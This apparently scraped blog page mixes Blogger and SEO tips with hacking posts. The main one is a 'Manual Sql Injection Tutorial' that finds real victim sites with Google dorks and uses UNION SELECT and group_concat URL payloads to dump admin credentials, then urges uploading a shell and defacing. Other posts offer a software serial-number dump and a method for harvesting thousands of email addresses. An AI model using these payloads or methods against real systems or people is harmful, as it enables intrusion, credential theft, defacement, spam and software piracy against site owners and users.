The content in this blog just for educational purposes only.We are not responsible for anything.

Recent Post

Recent Posts

Showing posts with label blogspot tips and tricks. Show all posts
Showing posts with label blogspot tips and tricks. Show all posts

Friday, July 19, 2013

Use multiple accounts using MultiFox in Mozilla Firefox

Hi friends,

Today i am going to tell How to use Multiple accounts Using Multifox on firedox..

If you have more than one account in google,yahoo,facebook,ultoo,laaptu,ypox and so on..

Usually you login to one account and use it ,Logout and login to another account,

If you are using Firefox, then you can use the MultiFox add-on to login into multiple accounts at the same time.

Steps:Use multiple accounts using MultiFox in Mozilla Firefox

  • Use Firefox browser (Currently Multifox available only for Firefox)
  • Multifox, it allows simultaneously logins using different user ID without the need to logoff the current one before logging in with a new user name.
  • click on the green link on the right side Install Extension

click Allow

  • Click on the install button when asked,
    • Restart Firefox to finish the installation.
After the installation of the MultiFox add-on and restarting the Firefox browser, you are ready to tweet from your Firefox browser. If you want to login into a different account of the same service(for example, google, yahoo,
ultoo,laaptu,ypox and so on..etc), then just select File → New Identitity Profile as shown,




A new Firefox window will be opened with a new profile, in which you can login to annother account of the same service. Each profile is assigned a number. This number can be seen in the location bar. Clicking on the number in the location bar shows a About box for MultiFox addon. If Firefox crashes, all the extra profiles generated by Multifox will be restored when you restore the original instance of Firefox.
  • Click the Blue box in the aderess bar


  • Finally opened all 4 Accounts in firefox using Multifox.

1 Million Serial Numbers of Different Softwares

Hi friends giving you all 
1 Million Serial Numbers of Different Softwares
download in single click


HOW TO GENERATE THOUSANDS OF GENUINE EMAIL IDS FOR FREE

Hi, here I am once again, with a new trick about How to generate 1000's of genuine e-mail id's with in 5 to 10 minutes , all you have to do is just follow these simple steps . its up to you that how you want to use them . So be careful about it. 



Requirements :-
Mozilla Firefox or Google Chrome browser.
Auto pager Plugin. Download it from here:- For Mozilla Firefox, For Google Chrome
A bit brain (very important)

LETS START GENERATING E-MAIL ID'S :-
Go to http://www.google.com, click on "Search settings" in the top right corner and change the number of results to display "100" per page, now click on Save preferences.
Now in the search bar type a keyword(s) and the e-mail extension in speech marks For example :- xyz"@gmail.com" What it will do is search for web-pages that contain Gmail e-mail adresses and that are also related with your keyword. The speech marks around "@gmail.com" make sure that "@gmail.com" is on every web page that is a result of the search.

You can also search single websites for e-mail adresses as shown on the example :- site:twitter.com "@gmail.com" The example shown above will search the whole of twitter.com for"@gmail.com" email adresses. 
Now With your results in focus, click the arrow at the side of the AutoPager icon as shown in the picture below. Then goto "Immediately load > All pages" .as shown in screenshot. With your search results still in focus, scroll all the way down and AutoPager should load the next page of results onto the same page you are currently on. Keep scrolling till all pages have loaded onto the samepage.



Press "ctrl + a" to select all of the pages then press "ctrl + c" to copy the results. With the results still in the clipboard (Still copied) go to http://www.skymem.com/ or Click here . Paste your results into the first box which says "1. Put text with email addresses here:" and just click on Start Extracting Emails Button on top of that box. The settings should already be correct with "unique emails" and "sortticked" So no need to Touch that option. 
The e-mail adresses should show in the Results box (3rd box) almost instantly.
Now copy the results from the results box paste them into Notepad. Sometimes the e-mail address seem to end in ".com." instead of just".com" so in notepad go to "Edit > Replace" and in the "Find what" text-box type ".com." without the speech marks("") in the "Replace with" textbox type".com" , without the speech marks.


Wednesday, July 10, 2013

Manual Sql Injection Tutorial

 

Manual Sql Injection Tutorial

This is just for educational purpose only, we are not responsible for anything.

In this tutorial i will be demonstrating you how to exploit a SQL Vulnerable website, and how to dig juicy information like administrator username and password of the website. I will be showing you guys how to exploit a vulnerable site using a live example i.e a SQL Vulnerable website.



What is SQLi ?
The Structured Query Language Interface (SQLI) is the internal interface between an application and the Online Web Server.


Confused because of lots of Technical Jargons?
Ok, I will make it simple. Basically a web hosting saves all its information in a table format known as Database. So all the usernames and password for accessing the webhosting will also be saved in the very same format. So SQLI is an interface where the user sends a query and the database gives an automated reply. So we will use this method to get the information about the admin's username and password, hence we get to access the complete web server.


So Lets Start Now,


Things Required :
1.SQL Vulnerable Website (OfCourse :P)
2.Pateince
3.Brain xD !





The beauty of searching for targets is a lot easier than it sounds, the most common
method of searching is (Dorks). Dorks are an input query into a search engine (Google) which
attempt to find websites with the given texxt provided in the dork itself. So navigate to


Google and copy the following into the search box:
inurl:"products.php?prodID="
This search will return websites affiliated with Google with "products.php?prodID=" within
the URL.
You can find a wide range of dorks to use by searching the forum.
I advise you to create your own dorks, be original, but at the same time unique, think of
something to use that not many people would have already searched and tested.
An example of a dork I would make up:
inurl:"/shop/index.php?item_id=" & ".co.uk"
So using your own dorks isn't a bad thing at all, sometimes your dorks wont work, nevermind
even I get it..


Testing Targets for Vulnerabilities
It's important that this part's done well. I'll explain this as simply as I can.
After opening a URL found in one of your dork results on Google you now need to test the


site if it's vulnerable to SQL injection.


Example:
http://www.site.com/index.php?Client_id=23


To test, just simply add an asterik ' at the end of the URL


Example:
http://www.site.com/index.php?Client_id=23'


How to tell if the sites vulnerable:
- Missing text, images, spaces or scripts from the original page.
- Any kind of typical SQL error (fetch_array) etc.


So if the website you're testing produces any of the above then the site is unfortunately


vulnerable, which is where the fun starts.


Finding Columns & the Vulnerable Columns
As I noted in the first section of the tutorial I advise you do pretty much everything
manually with SQL injection, so by using the following commands (providing they're followed
correctly) you will begin to see results in no time 


Example:
http://www.site.com/index.php?Client_id=23'
^^^^^^^^^^^^^^^^^^^^^^^^
IF THE SITE IS VULNERABLE
Refer to the following to checking how many columns there are.
(order+by) the order by function tells the database to order columns by an integer (digit
e.g. 1 or 2), no errors returned means the column is there, if there's an error returned the
column isnt there


wxw.site.com/index.php?Client_id=23+order+by+1 < No Error
wxw.site.com/index.php?Client_id=23+order+by+2 < No Error
wxw.site.com/index.php?Client_id=23+order+by+3 < No Error
wxw.site.com/index.php?Client_id=23+order+by+4 < ERROR


From using order+by+ command and incremating the number each time until the page
displays an error is the easiest method to find vulnerable columns, so from the examples
above when attempting to order the columns by 4 there's an error, and so column 4 doesn't
exist, so there's 3 columns.


Finding Vulnerable Columns
Ok so let's say we were working on the site I used above, which has 3 columns. We now need
to find out which of those three coluns are vulnerable. Vulnerable columns allow us to
submit commands and queries to the SQL database through the URL. (union+select)
Selects all columns provided in the URL and returns the value of the vulnerable column e.g.


2. Example:
wxw.site.com/index.php?Client_id=23+union+select+1,2,3
The site should refresh, not with an error but with some content missing and a number is
displayed on the page, either 1, 2 or 3 (as we selected the three columns in the above URL
to test for column vulnerability).
Sometimes the page will return and look completely normal, which isn't a problem. Some sites
you are required to null the value you're injecting into.
In simpler terms, the =23 you see in the above URL after Client_id must be nulled in order
to return with the vulnerable column. So we simply put a hyphen (minus sign) before the 23
like so: -23


So the URL should now look something like this:


www.site.com/index.php?Client_id=-23+union+select+1,2,3


Now that should work, let's say the page refreshes and displays a 2 on the page, thus 2
being the vulnerable column for us to inject into. 


Obtaining the SQL Verison
Easier said than done, using the information found in the above sections e.g. amount of
columns and the vulnerable column. We now use a command (@@version) and in some cases
a series of commands to determine what the SQL version is on the current site. Version 4 or
version 5. See the example below to view what a URL should look like when the version
command has been inserted into the URL replacing the number 2 as 2 is the vulnerable column
in the example site.


Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,@@version,3


What you need to look for is a series of numbers e.g:
5.0.89-community
4.0.45-log


If the above failes and the site just returns an error or displays normally then we need to
use the convert function in order for the server to understand the command, don't worry
though this is usually the only thing you need to convert and it's on a rare occasion where
this is the case.


So, if the example site returned an error we need to replace @@version with the convert()


function:
convert(@@version using latin1)


So the example site will now look like this:
wxw.site.com/index.php?Client_id=-23+union+select+1,convert(@@version using latin1),3


Now if the page still decides to not return the error then the query must be hexxed:
unhex(hex(@@version))


So the example site will now look like this:
wxw.site.com/index.php?Client_id=-23+union+select+1,unhex(hex(@@version)),3


Depending on which version the SQL server it is, whether it be 4, or 5 the queries for
obtaining data from both versions are different, version 4 and 5 tables are explained below


 Version 4
- 1. Obtaining Tables and Columns


You will notice that obtaining tables and columns from version 4 MySQL servers is a little
more time consuming and confusing at times as we have to guess pretty much everyhing.
Because version 5 is more up to date and has information_schema which the database and
tables are stored in, MySQL version 4 doesn't.
Providing the MySQL version of the website is 4, we must do the following.


So, back to the example URL:
wxw.site.com/index.php?Client_id=23+union+select+1,@@version,3


We must now go back to the original URL which is:
wxw.site.com/index.php?Client_id=23+union+select+1,2,3


This is where the guessing begins, we need to guess table names.
How can we tell if the table name I guess exists?
The same as where we tested for the amount of columns.
If no error is produced then the table guessed exists.
Is there is an error then the table guessed doesn't exist, so just try another.
So we use the (from) command followed by the table name you are looking to see
exists.


Example:
wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from admin


Usual tables most people search for consist of obtaining user data, so again, be creative
just like with the dorks, common table names I use:


tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins


So if we tried the following as an example:


wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from admin
^^^
Error


wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from user
^^^
Error


wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from users
^^^^^
No Error


Now which table do you think exists..?
The table users exists


We are now required to guess column names from the existing table. So thinking logically,
which labelled columns within this table would represent data? Columns such as:
first_name, last_name, email, username, password, pass, user_id
^^^^^^^^^^^^^^^^^^^^^^^^^
Typical columns found in the users table.


So we now must think back to which column is vulnerable (in this case 2) and so we'll use
the URL and replace 2 with the column name you are attempting to see if exists in the users


table. Let's try a few of the typicals listed above:
wxw.site.com/index.php?Client_id=23+union+select+1,f_name,3 from users
^^^^
Error


wxw.site.com/index.php?Client_id=23+union+select+1,l_name,3 from users
^^^
Error


wxw.site.com/index.php?Client_id=23+union+select+1,address1,3 from users
^^^
Error


wxw.site.com/index.php?Client_id=23+union+select+1,email,3 from users
^^^^^
No Error


From the above we can clearly see that the column email exists within the table users, the
page should return displaying data (most probably an email address) or the data you are
extracting i.e if you pulled password from users and the column exists the first password
within that column will be displayed on screen.




2. Commands
From here we will be able to use certain commands to determine the amount of data we pull
from the database or which exact record you wish to pull from a column.
concat()
We will now use the concat() function to extract data from multiple columns if only one
column is vulnerable, in this case remembering back the vulnerable column is 2, so we can
only query in within this space.


Command: concat(columnname1,0x3a,columnname2)
0x3a is the hex value of a semi-colon : so the output data from the query will be displayed


like:this


Example:
wxw.site.com/index.php?Client_id=23+union+select+1,concat(email,0x3a,password),3 from users


The above will output the first email and password found in the table.


group_concat():


We will now use the group_concat() function to group all data from one column and display
them on one page. Same as the above concat() command just grouping all records together and displaying them as one.


Example:
wxw.site.com/index.php?Client_id=23+union+select+1,group_concat(email,0x3a,pass),3 from


users
Now the above should return ALL e-mails and passwords listed in the email and passwords
column within the users table.


limit 0,1
The limit command is somewhat useful if you're looking for a specific data record. Say for
instance we wanted to obtain the 250th record for emails in the table users. We would use:
limit 250,1 Thus displaying the 250th e-mail within the data.


Example:
wxw.site.com/index.php?Client_id=23+union+select+1,email,3+from+users+limit+250,1


Version 5
- 1. Obtaining Table Names


Now after that painstaking version 4 malakey lol, we're onto version 5, the easiest and
quickest version of MySQL to hack, so many things are already done for you, so realise the
possibilities and be imaginative.
Obtaining table names for version 5 MySQL servers is simple, using information_schema.tables


< For table extraction


So, example of the URL from earlier, but imagine it is now version 5


Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,table_name,3+from+information_schema.tables


The above URL will display only the first table name which is listed in the database


information_schema. So using group_concat()
just like in version 4 works with the same principle.


Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(table_name),3 from information_schema.tables


We should now be able to see all the tables listed on one page, sometimes the last tables
will be cut off the end because a portion of the page will be covered in table names from
information_schema which aren't useful for us so really, I usually prefer to display table
names from the primary database rather than information_schema, we can do the following by


using the +where+table_schema=database() command:
where => A query for selection
table_schema => Schema of tables from a database
database() => In context the primary database, just leave it as it is.


Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()


Example List of tables:
About, Admin, Affiliates, Access, Customer, Users


Now all tables should be displayed from the primary database, take your pick and get ready
to extract columns.




2. Obtaining Column Names from Table Names


Ok, suggesting from the above we decided to obtain column information from the table Admin.
Using information_schema once again but this time we will be using:
informaiton_schema.columns
instead of
informtion_schema.tables (as we want to extract columns now, not tables)
The thing with obtaining column information is similar to the principle of obtaining columns in version 4, except we dont have to guess, once again just one command lists them all when combines with group_concat()


Command:
Edit the vulnerable column (in this case 2) to:
column_name instead of table_name


And the end of the URL to:
+from+information_schema.columns where table_name=TableNameHEX


Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(column_name),3 from information_schema.columns where table_name=Admin


Now the above will return an error because of the way the command is used at the end of the URL (where table_name=Admin)
We must HEX the table name, in this case Admin
I use THIS website to for converting Text to Hex.


The HEX of Admin is: 41646d696e
Now we must add 0x (MySQL integer) at the front of the HEX, which should now look like this: 0x41646d696e
And pop it onto the end of the URL replacing Admin, so the URL should look something like the following.


Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(column_name),3 from information_schema.columns where table_name=0x41646d696e


Now all columns from the table Admin will be displayed on the page, just the same as version 4 we will use the same command to extract data from certain columns within the table.


Say for instance the following columns were displayed:
username, password, id, admin_user


We would be able to do the same as version 4, replacing the vulnerable column (2) with a column name (one of the above) i.e. username and password using the concat() function.


Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,concat(username,0x3a,password),3+from+Admin


Will display the first username and password data entries from the columns username and password in the table Admin.
Now, Find the admin panel of the website, enter the user and password. Upload a shell and deface xD !!


Now Clap For Youself :D




This is just for educational purpose only, we are not responsible for anything.



How to enable email subscription with Feedburner

How to enable email subscription with Feedburner

Now a days RSS feed is very famous and widely used. RSS feed is one of the major medium to promote your website and get more traffic. But not all the visitors to your website are familiar with RSS feed and some visitors just does not want to mess up with the RSS feeds using RSS reader. RSS is the push delivery system. But there is a service that you can provide to your visitors that is Email subscription. Here we will discuss about the email subscription through Feedburner. Feedburner is the widely used email subscription. If you have already a feedburner feed and need help in activation email subscription features then just follow the below steps:
  1. Go to Feedburner and login with your credentials
  2. Click “My Feeds” in the upper left hand corner(If you do not find that you can see the name of your feed, click that see the below image)


  3. Select your feed from the list
  4. Click the “Publicize” tab
  5. Click “Email Subscriptions” on the left
  6. Make sure “Feedburner” is selected, and click “Activate”
  7. Copy the HTML code in the box
  8. Now login to administrator account of your website and paste the code where you want to keep the subscribe by email text box.
It is up to you where do you want to place the feedburner subscription text box. You should have the knowledge of html.
That’s all, Now your visitors can get your site updates via email.

How to Decorate Blogger Comments

How to Decorate Blogger Comments

By default, Blogger comments are very simple with a profile picture but I'll tell you a simple way to make your comments look stylish, beautiful & completely customizable.

Remember: Before proceeding, please backup your current template layout. (?)

Find & Change the Default CSS Code for Comments


To do this quick makeover, just go to Layout then Edit HTML section. Find this code there:

/* Comments
----------------------------------------------- */
#comments h4 {
margin:1em 0;
font-weight: bold;
line-height: 1.4em;
text-transform:uppercase;
letter-spacing:.2em;
color: $sidebarcolor;
}

#comments-block {
margin:1em 0 1.5em;
line-height:1.6em;
}
#comments-block .comment-author {
margin:.5em 0;
}
#comments-block .comment-body {
margin:.25em 0 0;
}
#comments-block .comment-footer {
margin:-.25em 0 2em;
line-height: 1.4em;
text-transform:uppercase;
letter-spacing:.1em;
}
#comments-block .comment-body p {
margin:0 0 .75em;
}
.deleted-comment {
font-style:italic;
color:gray;
}


Tip: If you can't find this code then please comment here with your blog address otherwise continue with the tutorial.


Actually, this is the CSS code responsible for the appearance of your comments. So, you need to replace the above code with the following code:

/* Comments
----------------------------------------------- */

.comment-form {
margin-left:.5em;}

.comments {
margin-left:.5em;}

#comments h4 {
margin:1em 0;
font-weight: bold;
line-height: 1.4em;
text-transform:uppercase;
letter-spacing:.2em;
color: $commentheadingcolor;
}

#comments-block {
font-size:13px;
}
#comments-block .comment-author {
color: $commentauthorcolor;
font-size:12px;
background: $commentauthorbackcolor;
padding:4px;
font-weight:bold;
text-decoration:none;
}
#comments-block .comment-author a:link, .comment-author a:visited, .comment-author a:hover {
font-weight:bold;
color: $commentauthorcolor;
border-bottom:solid 1px $authorborderbottom;
padding-bottom:2px;
text-decoration:none;
}

dd{margin:0; border:0; padding:0; padding:0 10px; background: $bodybackcolor; color: $bodytexcolor;}
dd.comment-body{border:solid 2px $bodysidesbordercolor; border-bottom:none; border-top:none;}
dd.comment-body p{border:0; padding:0; margin:0; padding:10px 0;}
dd.comment-footer{border:solid 2px $footerbordercolor; border-top:none; margin-bottom:10px;}

#comments-block .comment-footer {
margin:-.25em 0 2em;
line-height: 1.4em;
text-transform:uppercase;
letter-spacing:.1em;
}

.comment-timestamp{font-size:11px; color: $commentdatecolor;}
.comment-timestamp a:link, .comment-timestamp a:visited {
font-size:11px; color: $commentdatecolor; background:none; width:auto; height:auto;
text-align:left; font-weight:normal;}


.deleted-comment {
font-style:italic;
color:gray;
}


Save the template and see the comments. You'd notice that the comments are now looking really decent and stylish.

Add the Customization Code in CSS


We've changed the default styling for comments after adding the code in previous step but everyone has different taste so let's add some juicy code to the template's HTML. Now, scroll down a little and you'll find this piece of code:

/* Variable definitions
====================


Right after the above code, you need to add the following code:











Now, the overall code should look something like this:

/* Variable definitions
====================










Save your template. Now, you can go to the Fonts & Colors section and customize all the colors according to your taste.

How to Change Sidebar Background Color in Blogger Templates

How to Change Sidebar Background Color in Blogger Templates

Hi guys, writing a tutorial after a long time. Anyway, here is a simple tutorial to change the sidebar background color in new Blogger Template Designer templates. After this tutorial, you can easily change the sidebar background color from Template Designer.

Update: I've updated this tutorial. Now you can change the sidebar background color in all default Blogger templates. Templates with multiple sidebars can also have different colors for each sidebar.

Steps!

  1. Open the Template section.
  2. Blogger Updated Dashboard
  3. Click the Edit HTML button.
  4. Blogger Edit HTML Button
  5. A new window will open. You'd have to click the Proceed button to start editing.
  6. Blogger Proceed Button
  7. Find the following code:
    /* Variable definitions
    ====================
  8. REPLACE the above code with the following one:
    /* Variable definitions
    ====================
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
  9. After that, find ]]>
and REPLACE it with the following code:
#sidebar-right-1 { background: $(sidebar.right.top.color); }
#sidebar-right-2-1 { background: $(sidebar.right.left.color); }
#sidebar-right-2-2 { background: $(sidebar.right.right.color); }
.column-right-inner, column-right-outer { background: $(sidebar.bgr.color); }
.column-left-inner, column-left-outer { background: $(sidebar.bgl.color); }
#sidebar-left-1 { background: $(sidebar.left.top.color); }
#sidebar-left-2-1 { background: $(sidebar.left.left.color); }
#sidebar-left-2-2 { background: $(sidebar.left.right.color); }
]]>
  • Click Save template and then Close button.
  • Blogger Save Template Close Buttons

    How to Change the Background Color in Template Designer?


    We've finished the coding stuff, now simply click the Customize button to open Blogger Template Designer.
    Blogger Customize Button
    Then click the Advanced tab. You'll see 3 new options there. First one is Right Sidebar Background. It has 3 further options.


    Right Top Sidebar Background: This will change the background color of the top section in the right column.
    Right Left Sidebar Background: This will change the background color of the left sidebar in the right column.
    Right Right Sidebar Background: This will change the background color of the right sidebar in the right column.


    Next option is Left Sidebar Background. It also has 3 further options.


    Left Top Sidebar Background: This will change the background color of the top section in the left column.
    Left Left Sidebar Background: This will change the background color of the left sidebar in the left column.
    Left Right Sidebar Background: This will change the background color of the right sidebar in the left column.


    Last option will be Sidebar Column Background. This is the most interesting one because it affects the whole column rather than a single sidebar section. It has 2 further options.


    Right Sidebar BG Color: The color in this option will change the background of whole column on the right side.
    Left Sidebar BG Color: This option will change the background of left side column.

    Tuesday, July 9, 2013

    Understanding Meta Tags and their Importance

     

    Understanding Meta Tags and their Importance

    Hello Readers, Continuing posting useful SEO and Blogging tips, this article focuses on the importance of Meta Tags. I have been asked by a few newbie bloggers to post about the importance of Meta tags, how they help in optimizing blogs and how to use them. I am writing this post so that all the newbie bloggers could be benefited and share this information. Later in this article we will explore some great and useful information about Meta tags and how they help you improve your blog SEO.
    Meta Tags

    What are Meta Tags?

    In general Meta word is used for describing the data about some data. In blogging, it has the same meaning. It informs the search engines about the main data about your blog. Meta tags are the one of those basic elements of your blog that contributes towards the strong foundation of advance SEO of your blog.

    Why are Meta tags Important?

    Search engines do not share much information about how they use our Meta information. But SEO experts believe that every Meta tag has its own importance and weightage in SEO. If you talk about Title and Description Meta tags; they are used by search engines to display the search results. You can see that your posts title and description is visible in the SERP (search engine results page).

    What Meta Tags to focus?

    There are many Meta tags that can be included in your blog. But you should be focusing more on Meta title, Meta description and Meta keywords tags. Every tag has its own length limits so you need to write optimal Meta tags.
    Now we shall see how to write Meta tags. Before going further let us see the basic structure of a Meta tag:

    <meta name=”Meta-Tag-Name” content=”Meta-Tag-Content” />

    Meta tags are placed just under the opening head tag of your template. Meta tags have two important arguments- name and content. The name field contains the type of the Meta tag like keyword, description or title and Content field contains the data associated with title, keyword or description. Now I hope you are a little familiar with these tags and we shall move further to explore more about these tags.
    Meta tags in SERP

    Meta Title:

    Meta title tag holds the title of your blog post. This tag is the most important Meta tag and conveys the abstract information about the webpage to the search engines. The title should not be more than 70 characters including white spaces. You can see the Meta title tags in the search results on the top of the description. A lengthy Title tag (exceeding 70 characters) will be trimmed in the search results. Always write concise but descriptive titles for your posts. You should also check how to optimizeyour post titles to increase your posts visibility in the search results.

    Meta Description:

    Meta description tag holds the description about the webpage or blog post. As shown in the above screenshot the description is visible in the search results just beneath the title tag and hence it is very important to write an optimized Meta description tag. The limit for this tag is set to 160 characters. Make sure that there is no more than 1 Meta description tag on your webpage. You can fix the duplicate or re occurring Meta description tags using the blogger pagetype conditions.

    Meta Keywords:

    Meta keywords tag used to be an important factor in the Google Page ranks but now Google does not consider the Meta keywords tags for providing page ranks to any blog. Meta keywords tag includes the main keywords for your main content. You can do a keyword research using Google Adwords keyword tool to identify the most suitable keywords of your blog and include them in this tag. Make sure you do not use useless and non-related keywords. Mention 5-7 closely related keywords to the content on the webpage in this tag.
    I hope I have cleared doubts of many people by providing all this information. If you have any doubt regarding any information provided in this article, please comment here. I will be glad to help you.
    You can check out our blogger tips and tricks section for more blogging and seo related articles on our blog. It will improve your blogging expereice.
    If you like my work; you can show your regards by hitting Facebook like button, following us on Google+ or Twitter, stumbling our posts on stumbleupon or giving us a link back via the links below. Stay tuned for more updates.

     


    3 On-Page SEO tips for bloggers

     

    3 On-Page SEO tips for bloggers

    Hello Readers, We all know how important SEO or search engine optimization is for our sites and blogs. In this post I will tell you 3 most used on page SEO tips that every blogger must use to optimize their blog for the search engines. These are very basic SEO tips but still very effective and gives a strong foundation to the advance seo for your bloggers blog. A good SEO results in increase of your blog traffic and makes your blog a brand among the other results displayed in SERP (Search engine results page). Unziptech has already provided some basic as well as advance SEO tips for bloggers and this post will talk about the importance of on page SEO.
    on page seo

    What is On-Page SEO?

    On page SEO refers to the SEO achieved by optimizing your blog content for the search engines. It generally includes adding Meta tags, Keywords Selection, Internal Linking and few other SEO strategies.

    What should be avoided while doing On-page SEO?


    • Duplicate Articles/Content.
    • URL variants of the same page.
    • Duplicate Meta Titles & Descriptions.
    • Bad SEO practices like Hidden Texts/Anchor tags, Keyword Stuffing etc.

    Now we should check out some useful On-Page SEO strategies.

    Keyword Research:

    Keywords are the words phrases around which your main content revolves. You should be able to choose the best keywords for your main content so that it stands unique among the search results. You can use the GoogleAdwords Keywords Tool for identifying the most suitable keywords for your content. Always make a healthy keyword density in your content. Do not over use keywords in your content; it will frustrate your online readers. Try to maintain 2-3% of keyword density in your content, more than that could be considered as keyword stuffing.

    Killer Content:

    I have repeated this line several times on my blog and you must have heard or read about it zillions times on many blogs that “Content is King”. You should be able to write quality content for your blog which is optimzied for Search Engines as well as your online Readers. Make it easy for your Readers to understand your content by using the visuals like Images/ Animations or Videos. You should also add social sharing and subscribing widget so that your content could be easily shared by your readers. A quality/unique content is the main constituent of On-Page SEO.

    Internal Linking:

    Internal linking refers to some content or articles with in your blog. Internal linking is vital in blogging and SEO these days. It not only helps you increasing the readership of your blog but also helps in increasing the Google Page Rank. You should know the importance of internal linking. Always link to your best articles while writing new posts for your blog. It will help your old content, getting a new life.
    These are some really useful and effective on page seo tips. You should also go through basic SEOtips for bloggers, published a few months back on our blog that revolves around these tips.
    You can checkout our Blogger tips and tricks section for more blogging and SEO optimization tips. It will improve your blogging experience.
    If you like my work; you can show your regards by hitting Facebook like button, following us on Google+ or Twitter, stumbling our posts on stumbleupon or giving us a link back via the links below. Stay tuned for more updates.

     


    Google ability:manage and boost your authorship value

     

    Google ability:manage and boost your authorship value

    If you've been writing for the online media or for websites, then you must be aware of the term ‘Google ability’. The more you interact on various social media platforms, the higher will be your authorship value. However, there are more than just that for you to discover and so, you must go through the article to find out more about increasing your Google ability. 
    google ability and authorship

    Ways to boost your Google ability

    Here are some of the most successful tips to enhance your Google ability:
    Start blogging more frequently – You just can’t hope to enjoy greater dominance without blogging aggressively. Your blog posts should be written in a lucid, attractive language that makes their readers to engage in social discussion and share that information with others.

    However, the most suitable way to generate higher fan following is to create content that people want to read and are interested in. It is best to write on topics that you like the most. Once you've posted an article on your blog/website, share that among st your online community members.
    Guest post in online journalsBeing a part of a creative profession such as this, it is an imperative for you to let others discover your prowess in writing high quality posts / socially attractive posts. One of the best places to do so is to submit your works to online journals.

    This type of online media will help in to enhance your reader’s base. Moreover, your name and may be even your image will come up alongside your content, if it becomes viral. This is a drastic method to increase your authorship value in the biggest search engine of the planet, Google.
    Besides, boosting your Google ability it is equally important for you to manage that to retain your fan base as well as authorship value.

    Ways to manage your Google ability

    You can manage your Google ability through the following ways:
    Online contests Take part in online writing contests on a regular basis. Most of the time, judges and event coordinators publish the article of their winners on the Web. So, you might get and have your article posted on one of the leading websites of the Internet.
    Videos –Create and post videos of yourself on YouTube. This is because Google owns it and so, your video may show up in search results whenever a visitor submits a query related to its content. So, from the next time post a good video and tag that with your name as the keyword as well as description. This is also a very good trick of search engine optimization or SEO.
    Finally, being Google able is all about being applicable and there is nothing to do with the medium. It is the message that you send to the visitors that’ll either make or break your web presence.
    If you like my work; you can show your regards by hitting Facebook like button, following us on Google+ or Twitter, stumbling our posts on stumbleupon or giving us a link back via the links below. Stay tuned for more updates.